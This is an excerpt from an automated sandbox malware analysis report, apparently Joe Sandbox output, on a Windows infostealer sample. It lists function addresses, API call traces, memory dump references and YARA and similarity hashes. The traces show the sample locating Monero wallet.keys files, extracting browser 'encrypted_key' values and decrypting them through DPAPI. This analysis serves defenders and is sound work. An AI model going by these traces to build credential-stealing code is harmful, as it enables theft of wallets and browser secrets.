                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014D481
                              • lstrlen.KERNEL32(00000000), ref: 0014D698
                              • lstrlen.KERNEL32(00000000), ref: 0014D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0014D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4d8bd3e669c9bc78989daca0c5ff0ef1f53929395d1a5f6cdc4300bdfa3ceb62
                              • Instruction ID: 48e0221d6652e6ee23f072685729718f5fee335ab3294ed99976d980abd15124
                              • Opcode Fuzzy Hash: 4d8bd3e669c9bc78989daca0c5ff0ef1f53929395d1a5f6cdc4300bdfa3ceb62
                              • Instruction Fuzzy Hash: F291E171990118DBDB05EBA4DC96DEE733CBF24302F904259F9276A091EF346A0DCB62
                              Function 0014D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014D801
                              • lstrlen.KERNEL32(00000000), ref: 0014D99F
                              • lstrlen.KERNEL32(00000000), ref: 0014D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0014DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 470d239272a3e9fe5a83378a908a0aabbfe702e0b70d4b2b444d1a779da0b39c
                              • Instruction ID: 90f71ee3a50c8a0a6d29ff643fde065b6f3c997e7a3333c4950b16b8a808e34d
                              • Opcode Fuzzy Hash: 470d239272a3e9fe5a83378a908a0aabbfe702e0b70d4b2b444d1a779da0b39c
                              • Instruction Fuzzy Hash: BE81D271950118DBDB05FBA4DC56DEE733CBF24302F904659F916AA091EF346A0DCBA2
                              Function 00153560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 6978c4d9b3326f6231290caae38b042564fad2998210439bb9e5a38bd164e789
                              • Instruction ID: 8f7037bde36098673eec49bd98845d340f557fbfac052e33e38db33ddd760b92
                              • Opcode Fuzzy Hash: 6978c4d9b3326f6231290caae38b042564fad2998210439bb9e5a38bd164e789
                              • Instruction Fuzzy Hash: 97416271D10208EFCB05EFE4CC45AEEB774AF58305F408118E8227B290EB759A09CFA2
                              Function 00149CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00149D39
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                                • Part of subcall function 00149AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                                • Part of subcall function 00149AC0: LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                                • Part of subcall function 00149B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00149B84
                                • Part of subcall function 00149B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00149BA3
                                • Part of subcall function 00149B60: LocalFree.KERNEL32(?), ref: 00149BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 9e14a40a968065944f8988c14575771e985ffcf054946fedb6fa94e97778759b
                              • Instruction ID: d410efd4c6e7346a05f217944da2c49b6720038732cec87fe8c643e241a3d98e
                              • Opcode Fuzzy Hash: 9e14a40a968065944f8988c14575771e985ffcf054946fedb6fa94e97778759b
                              • Instruction Fuzzy Hash: C9316FB6D10209ABCF14DFE4DC86EEFB7B8BF58304F144519E915A7251EB309A14CBA1
                              Function 00158680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001605B7), ref: 001586CA
                              • Process32First.KERNEL32(?,00000128), ref: 001586DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001586F3
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • CloseHandle.KERNEL32(?), ref: 00158761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 42a2dcab278ea0cd9ec5f74203a8a0e3c7ec2980f68d48dc556207c3279631de
                              • Instruction ID: b46a4e114d7484e537b0668b4eb3057934a5459237eda9bd47d57002be07d59b
                              • Opcode Fuzzy Hash: 42a2dcab278ea0cd9ec5f74203a8a0e3c7ec2980f68d48dc556207c3279631de
                              • Instruction Fuzzy Hash: 19318F71941218EBCB25DF90CC51FEEB778FF18702F504299F91AAA190DB306A48CFA1
                              Function 00157980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00160E00,00000000,?), ref: 001579B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001579B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00160E00,00000000,?), ref: 001579C4
                              • wsprintfA.USER32 ref: 001579F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 5b765afec51646ba26b3dfc7b08d1f6022b59446410c6a56389a01c180fee7b0
                              • Instruction ID: 8b1971631cdc6080efded523bb44ea9bfdc3030f9b5807e44b12bc9c0fe2629c
                              • Opcode Fuzzy Hash: 5b765afec51646ba26b3dfc7b08d1f6022b59446410c6a56389a01c180fee7b0
                              • Instruction Fuzzy Hash: 321118B2904618ABDB149FC9ED45BBEBBFCEB48B11F10415AF605A2280E3395940C7B1
                              Function 001592E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00153AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00153AEE,?), ref: 001592FC
                              • GetFileSizeEx.KERNEL32(000000FF,00153AEE), ref: 00159319
                              • CloseHandle.KERNEL32(000000FF), ref: 00159327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: c3d6974fa27f47b37c0a6b615e5b1d8c422099ff20c791bd02c0670ea8639a2f
                              • Instruction ID: b22cbec32dc315c494f5c47fd80b80251f1f568007a105e71b9ce25958ca7a11
                              • Opcode Fuzzy Hash: c3d6974fa27f47b37c0a6b615e5b1d8c422099ff20c791bd02c0670ea8639a2f
                              • Instruction Fuzzy Hash: 95F08C38E00308FBEB10DBF0DC08B9E77B9FB48311F108294BA21AB2C0D67096009B41
                              Function 0015C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0015C74E
                                • Part of subcall function 0015BF9F: __amsg_exit.LIBCMT ref: 0015BFAF
                              • __getptd.LIBCMT ref: 0015C765
                              • __amsg_exit.LIBCMT ref: 0015C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0015C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 2b32bb58096cd6883ea3ba911bd3d53ebe11f7a70d507b70526d65ee6e988d08
                              • Instruction ID: 9cffd8177756222cb7b05f3337db7d14b0012944dee6c742532dad92aa9eca5d
                              • Opcode Fuzzy Hash: 2b32bb58096cd6883ea3ba911bd3d53ebe11f7a70d507b70526d65ee6e988d08
                              • Instruction Fuzzy Hash: F1F09032948710DFD720BFB85C8674E33A06F14727F24414AFC35AE5D2CBA459889ED6
                              Function 00154F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154F7A
                              • lstrcat.KERNEL32(?,00161070), ref: 00154F97
                              • lstrcat.KERNEL32(?,00DD9210), ref: 00154FAB
                              • lstrcat.KERNEL32(?,00161074), ref: 00154FBD
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 0015492C
                                • Part of subcall function 00154910: FindFirstFileA.KERNEL32(?,?), ref: 00154943
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                                • Part of subcall function 00154910: FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                                • Part of subcall function 00154910: FindClose.KERNEL32(000000FF), ref: 00154B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: c88f34aac727d10bdfbb06c2a8e48425927e851f6bd69c665624ad22b0722398
                              • Instruction ID: 7f2c224ab8872af67229dba9b439a555f1b0c4c3edd5b6a3774f63f9d3291a3a
                              • Opcode Fuzzy Hash: c88f34aac727d10bdfbb06c2a8e48425927e851f6bd69c665624ad22b0722398
                              • Instruction Fuzzy Hash: B721DA76900308A7D755FBB0DC46EEE337CAB69301F004589B69997181EF749ACC8BA2